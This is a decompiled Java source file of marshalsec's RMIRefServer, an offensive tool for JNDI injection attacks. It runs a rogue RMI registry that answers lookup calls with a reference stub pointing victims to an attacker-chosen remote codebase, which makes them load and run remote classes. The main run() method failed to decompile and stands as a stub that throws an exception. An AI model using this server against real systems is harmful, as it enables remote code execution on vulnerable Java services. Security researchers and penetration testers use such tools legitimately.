package marshalsec.jndi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.net.URLClassLoader;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObject;
import java.rmi.server.UID;
import java.util.Arrays;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javax.naming.Reference;
import javax.net.ServerSocketFactory;
import marshalsec.util.Reflections;
import org.springframework.util.ClassUtils;
import sun.rmi.server.UnicastServerRef;

/* loaded from: input_file:marshalsec/jndi/RMIRefServer.class */
public class RMIRefServer implements Runnable {
    private int port;
    private ServerSocket ss;
    private Object waitLock = new Object();
    private boolean exit;
    private boolean hadConnection;
    private URL classpathUrl;

    /* loaded from: input_file:marshalsec/jndi/RMIRefServer$Dummy.class */
    public static class Dummy implements Serializable {
        private static final long serialVersionUID = 1;
    }

    /* JADX INFO: Access modifiers changed from: package-private */
    /* loaded from: input_file:marshalsec/jndi/RMIRefServer$MarshalOutputStream.class */
    public static final class MarshalOutputStream extends ObjectOutputStream {
        private URL sendUrl;

        public MarshalOutputStream(OutputStream outputStream, URL url) throws IOException {
            super(outputStream);
            this.sendUrl = url;
        }

        MarshalOutputStream(OutputStream outputStream) throws IOException {
            super(outputStream);
        }

        @Override // java.io.ObjectOutputStream
        protected void annotateClass(Class<?> cls) throws IOException {
            if (this.sendUrl != null) {
                writeObject(this.sendUrl.toString());
                return;
            }
            if (!(cls.getClassLoader() instanceof URLClassLoader)) {
                writeObject(null);
                return;
            }
            String str = "";
            for (URL url : ((URLClassLoader) cls.getClassLoader()).getURLs()) {
                str = str + url.toString();
            }
            writeObject(str);
        }

        @Override // java.io.ObjectOutputStream
        protected void annotateProxyClass(Class<?> cls) throws IOException {
            annotateClass(cls);
        }
    }

    public RMIRefServer(int i, URL url) throws IOException {
        this.port = i;
        this.classpathUrl = url;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }

    public boolean waitFor(int i) {
        try {
            if (this.hadConnection) {
                return true;
            }
            System.err.println("Waiting for connection");
            synchronized (this.waitLock) {
                this.waitLock.wait(i);
            }
            return this.hadConnection;
        } catch (InterruptedException e) {
            return false;
        }
    }

    public void close() {
        this.exit = true;
        try {
            this.ss.close();
        } catch (IOException e) {
        }
        synchronized (this.waitLock) {
            this.waitLock.notify();
        }
    }

    public static final void main(String[] strArr) {
        int i = 1099;
        if (strArr.length < 1 || strArr[0].indexOf(35) < 0) {
            System.err.println(RMIRefServer.class.getName() + "<codebase_url#classname> [<port>]");
            System.exit(-1);
            return;
        }
        if (strArr.length >= 2) {
            i = Integer.parseInt(strArr[1]);
        }
        try {
            System.err.println("* Opening JRMP listener on " + i);
            new RMIRefServer(i, new URL(strArr[0])).run();
        } catch (Exception e) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
    }

    /* JADX WARN: Failed to find 'out' block for switch in B:36:0x00e4. Please report as an issue. */
    /* JADX WARN: Finally extract failed */
    /* JADX WARN: Removed duplicated region for block: B:156:0x02c7 A[Catch: SocketException -> 0x02fa, Exception -> 0x02fc, TryCatch #16 {SocketException -> 0x02fa, Exception -> 0x02fc, blocks: (B:3:0x0002, B:5:0x0009, B:8:0x0015, B:11:0x0055, B:13:0x006b, B:33:0x00bc, B:35:0x00db, B:36:0x00e4, B:62:0x0100, B:64:0x010e, B:65:0x0126, B:91:0x011a, B:66:0x0140, B:67:0x01ad, B:73:0x01c1, B:71:0x01d5, B:76:0x01cb, B:83:0x0218, B:81:0x022c, B:86:0x0222, B:87:0x0265, B:88:0x0268, B:38:0x014c, B:44:0x0162, B:42:0x0176, B:47:0x016c, B:54:0x0185, B:52:0x0199, B:57:0x018f, B:58:0x019e, B:59:0x01a1, B:96:0x01e5, B:107:0x01f2, B:105:0x0206, B:110:0x01fc, B:112:0x020d, B:18:0x0086, B:24:0x0094, B:22:0x00a8, B:27:0x009e, B:28:0x00ad, B:29:0x00b0, B:118:0x023c, B:128:0x0249, B:126:0x025d, B:131:0x0253, B:133:0x0264, B:136:0x004d, B:142:0x0275, B:144:0x0285, B:145:0x0289, B:147:0x0290, B:151:0x0299, B:152:0x02a3, B:138:0x02b1, B:139:0x02b4, B:140:0x02bf, B:156:0x02c7, B:157:0x02cb, B:159:0x02d2, B:166:0x02e2, B:167:0x02e6, B:169:0x02ed, B:171:0x02f6), top: B:2:0x0002 }] */
    /* JADX WARN: Removed duplicated region for block: B:159:0x02d2 A[Catch: SocketException -> 0x02fa, Exception -> 0x02fc, TryCatch #16 {SocketException -> 0x02fa, Exception -> 0x02fc, blocks: (B:3:0x0002, B:5:0x0009, B:8:0x0015, B:11:0x0055, B:13:0x006b, B:33:0x00bc, B:35:0x00db, B:36:0x00e4, B:62:0x0100, B:64:0x010e, B:65:0x0126, B:91:0x011a, B:66:0x0140, B:67:0x01ad, B:73:0x01c1, B:71:0x01d5, B:76:0x01cb, B:83:0x0218, B:81:0x022c, B:86:0x0222, B:87:0x0265, B:88:0x0268, B:38:0x014c, B:44:0x0162, B:42:0x0176, B:47:0x016c, B:54:0x0185, B:52:0x0199, B:57:0x018f, B:58:0x019e, B:59:0x01a1, B:96:0x01e5, B:107:0x01f2, B:105:0x0206, B:110:0x01fc, B:112:0x020d, B:18:0x0086, B:24:0x0094, B:22:0x00a8, B:27:0x009e, B:28:0x00ad, B:29:0x00b0, B:118:0x023c, B:128:0x0249, B:126:0x025d, B:131:0x0253, B:133:0x0264, B:136:0x004d, B:142:0x0275, B:144:0x0285, B:145:0x0289, B:147:0x0290, B:151:0x0299, B:152:0x02a3, B:138:0x02b1, B:139:0x02b4, B:140:0x02bf, B:156:0x02c7, B:157:0x02cb, B:159:0x02d2, B:166:0x02e2, B:167:0x02e6, B:169:0x02ed, B:171:0x02f6), top: B:2:0x0002 }] */
    /* JADX WARN: Removed duplicated region for block: B:69:0x01bc  */
    /* JADX WARN: Removed duplicated region for block: B:79:0x0213  */
    @Override // java.lang.Runnable
    /*
        Code decompiled incorrectly, please refer to instructions dump.
        To view partially-correct add '--show-bad-code' argument
    */
    public void run() {
        /*
            Method dump skipped, instructions count: 773
            To view this dump add '--comments-level debug' option
        */
        throw new UnsupportedOperationException("Method not decompiled: marshalsec.jndi.RMIRefServer.run():void");
    }

    private void doMessage(Socket socket, DataInputStream dataInputStream, DataOutputStream dataOutputStream) throws Exception {
        System.err.println("Reading message...");
        int read = dataInputStream.read();
        switch (read) {
            case 80:
                doCall(dataInputStream, dataOutputStream);
                break;
            case 81:
            case 83:
            default:
                throw new IOException("unknown transport op " + read);
            case 82:
                dataOutputStream.writeByte(83);
                break;
            case 84:
                UID.read(dataInputStream);
                break;
        }
        socket.close();
    }

    private void doCall(DataInputStream dataInputStream, DataOutputStream dataOutputStream) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(dataInputStream) { // from class: marshalsec.jndi.RMIRefServer.1
            @Override // java.io.ObjectInputStream
            protected Class<?> resolveClass(ObjectStreamClass objectStreamClass) throws IOException, ClassNotFoundException {
                if ("[Ljava.rmi.server.ObjID;".equals(objectStreamClass.getName())) {
                    return ObjID[].class;
                }
                if ("java.rmi.server.ObjID".equals(objectStreamClass.getName())) {
                    return ObjID.class;
                }
                if ("java.rmi.server.UID".equals(objectStreamClass.getName())) {
                    return UID.class;
                }
                if ("java.lang.String".equals(objectStreamClass.getName())) {
                    return String.class;
                }
                throw new IOException("Not allowed to read object");
            }
        };
        try {
            ObjID read = ObjID.read(objectInputStream);
            if (read.hashCode() == 2) {
                handleDGC(objectInputStream);
                return;
            }
            if (read.hashCode() == 0 && handleRMI(objectInputStream, dataOutputStream)) {
                this.hadConnection = true;
                synchronized (this.waitLock) {
                    this.waitLock.notifyAll();
                }
            }
        } catch (IOException e) {
            throw new MarshalException("unable to read objID", e);
        }
    }

    private boolean handleRMI(ObjectInputStream objectInputStream, DataOutputStream dataOutputStream) throws Exception {
        int readInt = objectInputStream.readInt();
        objectInputStream.readLong();
        if (readInt != 2) {
            return false;
        }
        System.err.println("Is RMI.lookup call for " + ((String) objectInputStream.readObject()) + " " + readInt);
        dataOutputStream.writeByte(81);
        MarshalOutputStream marshalOutputStream = new MarshalOutputStream(dataOutputStream, this.classpathUrl);
        Throwable th = null;
        try {
            try {
                marshalOutputStream.writeByte(1);
                new UID().write(marshalOutputStream);
                System.err.println(String.format("Sending remote classloading stub targeting %s", new URL(this.classpathUrl, this.classpathUrl.getRef().replace('.', '/').concat(ClassUtils.CLASS_FILE_SUFFIX))));
                ReferenceWrapper referenceWrapper = (ReferenceWrapper) Reflections.createWithoutConstructor(ReferenceWrapper.class);
                Reflections.setFieldValue(referenceWrapper, "wrappee", new Reference("Foo", this.classpathUrl.getRef(), this.classpathUrl.toString()));
                Field declaredField = RemoteObject.class.getDeclaredField("ref");
                declaredField.setAccessible(true);
                declaredField.set(referenceWrapper, new UnicastServerRef(12345));
                marshalOutputStream.writeObject(referenceWrapper);
                marshalOutputStream.flush();
                dataOutputStream.flush();
                if (marshalOutputStream == null) {
                    return true;
                }
                if (0 == 0) {
                    marshalOutputStream.close();
                    return true;
                }
                try {
                    marshalOutputStream.close();
                    return true;
                } catch (Throwable th2) {
                    th.addSuppressed(th2);
                    return true;
                }
            } catch (Throwable th3) {
                th = th3;
                throw th3;
            }
        } catch (Throwable th4) {
            if (marshalOutputStream != null) {
                if (th != null) {
                    try {
                        marshalOutputStream.close();
                    } catch (Throwable th5) {
                        th.addSuppressed(th5);
                    }
                } else {
                    marshalOutputStream.close();
                }
            }
            throw th4;
        }
    }

    private static void handleDGC(ObjectInputStream objectInputStream) throws IOException, ClassNotFoundException {
        objectInputStream.readInt();
        objectInputStream.readLong();
        System.err.println("Is DGC call for " + Arrays.toString((ObjID[]) objectInputStream.readObject()));
    }

    protected static Object makeDummyObject(String str) {
        try {
            ClassLoader classLoader = new ClassLoader() { // from class: marshalsec.jndi.RMIRefServer.2
            };
            ClassPool classPool = new ClassPool();
            classPool.insertClassPath(new ClassClassPath(Dummy.class));
            CtClass ctClass = classPool.get(Dummy.class.getName());
            ctClass.setName(str);
            return ctClass.toClass(classLoader).newInstance();
        } catch (Exception e) {
            e.printStackTrace();
            return new byte[0];
        }
    }
}
